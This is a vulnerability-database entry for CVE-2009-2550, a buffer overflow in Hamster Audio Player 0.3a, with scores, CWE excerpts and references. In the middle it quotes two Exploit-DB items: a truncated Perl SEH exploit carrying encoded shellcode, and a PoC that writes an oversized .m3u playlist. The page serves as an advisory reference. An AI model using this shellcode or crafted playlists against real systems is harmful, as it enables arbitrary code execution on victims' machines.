CVE-2009-2550
published 2009-07-20CVE-2009-2550: Stack-based buffer overflow in Hamster Audio Player 0.3a allows remote attackers to execute arbitrary code via a long string in a (1) .m3u or (2) .hpl playlist…
PriorityP342critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
8.66%
94.4th percentile
Stack-based buffer overflow in Hamster Audio Player 0.3a allows remote attackers to execute arbitrary code via a long string in a (1) .m3u or (2) .hpl playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ondanera | hamster_audio_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Hamster Audio Player 0.3a - Universal Buffer Overflow (SEH)
exploitdb·2009-07-16
CVE-2009-2550 Hamster Audio Player 0.3a - Universal Buffer Overflow (SEH)
Hamster Audio Player 0.3a - Universal Buffer Overflow (SEH)
---
#!/usr/bin/perl
#[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH)
#[+] Author : ThE g0bL!N
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 (Fr)
##[+] Big thnx: His0k4
##########################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x4
Exploit-DB
Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)
exploitdb·2009-07-15
CVE-2009-2550 Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)
Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)
---
# Hamster Audio Player 0.3a Local BOF PoC
my $crash="\x41" x 4113 ;
open(myfile,'>>PoC.m3u')#/HPL
print myfile $crash;
# By ThE g0bL!N
#Download:http://www.brothersoft.com/hamster-audio-player-download-235347.html
#Note: His0k4 Win Rak :(
# milw0rm.com [2009-07-15]
No writeups or analysis indexed.
CWE
Access of Memory Location After End of Buffer
mitre_cwe
CWE-788 Access of Memory Location After End of Buffer
CWE-788: Access of Memory Location After End of Buffer
The product reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.
This typically occurs when a pointer or its index is incremented to a position after the buffer; or when pointer arithmetic results in a position after the buffer.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Confidentiality. Impact: Read Memory. For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffer's position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences.
Scope: Integrity, Availability. Impact: Modify Memory, DoS:
CWE
Out-of-bounds Write
mitre_cwe
CWE-787 Out-of-bounds Write
CWE-787: Out-of-bounds Write
The product writes data past the end, or before the beginning, of the intended buffer.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity. Impact: Modify Memory, Execute Unauthorized Code or Commands. Write operations could cause memory corruption. In some cases, an adversary can modify control data such as return addresses in order to execute unexpected code.
Scope: Availability. Impact: DoS: Crash, Exit, or Restart. Attempting to access out-of-range, invalid, or unauthorized memory could cause the product to crash.
Scope: Other. Impact: Unexpected State. Subsequent write operations can produce undefined or unexpected results.
Detection Methods:
Automated Static Analysis: This weakness can often be detected using automated s
CWE
Improper Restriction of Operations within the Bounds of a Memory Buffer
mitre_cwe
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Background: Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity, Confidentiality, Availability. Impact: Execute Unauthorized Code or Commands, Modify Memory. If the memory accessible by the attacker can be effec
http://osvdb.org/55871http://secunia.com/advisories/35825http://www.exploit-db.com/exploits/9157http://www.exploit-db.com/exploits/9172https://exchange.xforce.ibmcloud.com/vulnerabilities/51732http://osvdb.org/55871http://secunia.com/advisories/35825http://www.exploit-db.com/exploits/9157http://www.exploit-db.com/exploits/9172https://exchange.xforce.ibmcloud.com/vulnerabilities/51732
2009-07-20
Published